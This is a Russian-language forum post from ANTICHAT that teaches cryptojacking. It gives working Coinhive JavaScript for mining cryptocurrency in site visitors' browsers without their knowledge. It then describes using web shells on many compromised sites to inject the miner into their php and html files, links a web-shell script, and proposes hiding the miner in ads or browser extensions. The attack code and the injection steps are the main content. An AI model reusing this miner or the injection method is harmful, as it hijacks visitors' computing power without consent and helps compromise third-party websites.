HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.01.2018, 00:37
DefWolf
Новичок
Регистрация: 24.10.2017
Сообщений: 0
С нами: 4502036

Репутация: 0
По умолчанию



Майнинг, также добыча— деятельность по поддержанию распределённой платформы и созданию новых блоков с возможностью получить вознаграждение в форме новых единиц и комиссионных сборов в различных криптовалютах, в частности в Биткойн.
Coin-hive.com - это сайт, который предлагает вебмастеру встроить в свой сайт утилиту для майнинга биткоинов.

Типичная майнинг-ферма – это высокопроизводительный компьютер с несколькими видеокартами. На первый взгляд кажется, что все просто: подключаешь компьютер к сети, настраиваешь и наблюдаешь, как он зарабатывает деньги.

Вместо того, чтобы создавать ферму из наших видеокарт, мы будем использовать мощность посетителей сайтов. Мы вставим javascript код на все страницы нашего сайта. Для майнинга криптовалюты мы будем использовать библиотеку coinhive.

JavaScript:


Код:

Дальше идет основная часть нашего кода. В ней мы указываем ключ XXXX и имя, которое будет отображаться у нас на странице. Потом мы указываем кол-во потоков, крайне важно, чтобы число потоков не превышало 8 или 16. Далее скрипт вывод в console.log информацию о нашем хэшах.

Подробнее с функциями библиотеки можно ознакомиться здесь.

Код:


Код:
    var miner = new CoinHive.User("XXXX", "Test");
    miner.start();
 
    setInterval( function() {
        miner.setNumThreads(8);
        miner.setThrottle(0.5);

        console.log("Hashes: " + miner.getHashesPerSecond() + " Total: " + miner.getTotalHashes() + " Accepted: " +  miner.getAcceptedHashes() + " Thread: " + miner.getNumThreads() );
    }, 1000);
Допустим мы имеем доступ ко множеству сайтов, где у нас установлен web-shell: https://pastebin.com/ycSazL8B
Регистрируемся на coinhive, получаем ключ и вставляем его в javascript код. В полуinfection указываем каталог, в файлы которого будет вставлен майнер. Шелл вставит вредоносный скрипт только в файлы имеющие расширение php или html.



Сколько мы получаем хэшей можно посмотреть в консоли. Чем больше на сайте будет посетителей, чем больше хэшей вы получите. Еще как один из вариантов код майнера можно вставить в рекламу или расширение для браузера.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.